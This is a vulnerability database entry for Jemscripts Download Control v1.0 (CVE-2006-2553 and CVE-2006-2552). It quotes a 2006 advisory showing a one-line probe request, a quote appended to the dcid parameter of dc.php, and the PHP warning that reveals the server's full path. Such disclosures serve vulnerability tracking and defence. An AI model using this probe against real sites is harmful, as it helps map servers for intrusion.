Jemscripts Download Control v1.0

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1053235 漏洞类型
发布时间 2006-05-25 更新时间 2006-05-25
CVE编号 CVE-2006-2553
CVE-2006-2552
CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2006050137
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
Jemscripts Download Control v1.0

Homepage:

http://www.jemscripts.co.uk

Description:

DownloadControl provides a complete download file management system that is easy to set-up and maintain and yet gives you powerful features for controlling and monitoring your site download files.  You will need to have a Unix, Linux or Windows server with PHP installed.  No database is required.

effected files:

dc.php

Exploit: SQL Injection of dc.php causes a full path disclosure error.

example:

http://www.example.com/dc.php?dcid=80477172'

Warning: file(datinfo36/''/module_data.dat): failed to open stream: No such file or directory in /homepages/examplesite/downloadcontrol/functions.php on line 130